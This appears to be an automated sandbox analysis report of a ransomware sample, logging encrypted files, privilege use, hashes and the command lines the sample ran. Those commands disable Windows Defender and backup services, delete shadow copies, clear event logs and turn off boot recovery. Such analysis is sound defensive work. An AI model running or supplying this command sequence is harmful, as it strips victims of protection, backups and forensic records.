| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AgAAAAIAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\10px.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedStoreLogo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNBI.TTF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_HAAAABwAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ransomware.exe
"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1819a" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1819a" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1819a" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/3284-130-0x0000000000000000-mapping.dmp
memory/1456-131-0x0000000000000000-mapping.dmp
memory/3200-132-0x0000000000000000-mapping.dmp
memory/464-133-0x0000000000000000-mapping.dmp
memory/1972-134-0x0000000000000000-mapping.dmp
memory/4128-135-0x0000000000000000-mapping.dmp
memory/4284-136-0x0000000000000000-mapping.dmp
memory/4496-137-0x0000000000000000-mapping.dmp
memory/2392-138-0x0000000000000000-mapping.dmp
memory/3308-139-0x0000000000000000-mapping.dmp
memory/2176-140-0x0000000000000000-mapping.dmp
memory/4184-141-0x0000000000000000-mapping.dmp
memory/4940-142-0x0000000000000000-mapping.dmp
memory/1348-143-0x0000000000000000-mapping.dmp
memory/1324-144-0x0000000000000000-mapping.dmp
memory/2980-145-0x0000000000000000-mapping.dmp
memory/4768-146-0x0000000000000000-mapping.dmp
memory/4944-147-0x0000000000000000-mapping.dmp
memory/4860-148-0x0000000000000000-mapping.dmp
memory/228-149-0x0000000000000000-mapping.dmp
memory/1844-150-0x0000000000000000-mapping.dmp
memory/3348-151-0x0000000000000000-mapping.dmp
memory/4404-152-0x0000000000000000-mapping.dmp
memory/2044-153-0x0000000000000000-mapping.dmp
memory/1328-154-0x0000000000000000-mapping.dmp
memory/3500-155-0x0000000000000000-mapping.dmp
memory/908-156-0x0000000000000000-mapping.dmp
memory/2972-157-0x0000000000000000-mapping.dmp
memory/1048-158-0x0000000000000000-mapping.dmp
memory/2984-159-0x0000000000000000-mapping.dmp
memory/3544-160-0x0000000000000000-mapping.dmp
memory/4044-161-0x0000000000000000-mapping.dmp
memory/4168-162-0x0000000000000000-mapping.dmp
memory/4156-163-0x0000000000000000-mapping.dmp
memory/2772-164-0x0000000000000000-mapping.dmp
memory/4452-165-0x0000000000000000-mapping.dmp
memory/1708-166-0x0000000000000000-mapping.dmp
memory/1556-167-0x0000000000000000-mapping.dmp
memory/4376-168-0x0000000000000000-mapping.dmp
memory/4568-169-0x0000000000000000-mapping.dmp
memory/4036-170-0x0000000000000000-mapping.dmp
memory/3188-171-0x0000000000000000-mapping.dmp
memory/1404-172-0x0000000000000000-mapping.dmp
memory/1940-173-0x0000000000000000-mapping.dmp
memory/3460-174-0x0000000000000000-mapping.dmp
memory/4928-175-0x0000000000000000-mapping.dmp
memory/4268-176-0x0000000000000000-mapping.dmp
memory/4416-177-0x0000000000000000-mapping.dmp
memory/5056-178-0x0000000000000000-mapping.dmp
memory/3132-179-0x0000000000000000-mapping.dmp
memory/4492-180-0x0000000000000000-mapping.dmp
memory/2840-181-0x0000000000000000-mapping.dmp
memory/5116-182-0x0000000000000000-mapping.dmp
memory/3856-183-0x0000000000000000-mapping.dmp
memory/1936-184-0x0000000000000000-mapping.dmp
memory/64-185-0x0000000000000000-mapping.dmp
memory/3660-186-0x0000000000000000-mapping.dmp
memory/3752-187-0x0000000000000000-mapping.dmp
memory/1304-188-0x0000000000000000-mapping.dmp
memory/1864-189-0x0000000000000000-mapping.dmp
memory/1228-190-0x0000000000000000-mapping.dmp
memory/4128-191-0x0000000000000000-mapping.dmp
memory/2596-192-0x0000000000000000-mapping.dmp
memory/4780-193-0x0000000000000000-mapping.dmp
memory/828-194-0x0000029450000000-0x0000029450022000-memory.dmp
memory/828-196-0x0000029450053000-0x0000029450055000-memory.dmp
memory/828-195-0x0000029450050000-0x0000029450052000-memory.dmp
memory/828-197-0x0000029450056000-0x0000029450058000-memory.dmp
memory/828-198-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 59d97011e091004eaffb9816aa0b9abd |
| SHA1 | 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b |
| SHA256 | 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d |
| SHA512 | d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6 |
memory/1036-201-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp
memory/1036-202-0x0000025979850000-0x0000025979852000-memory.dmp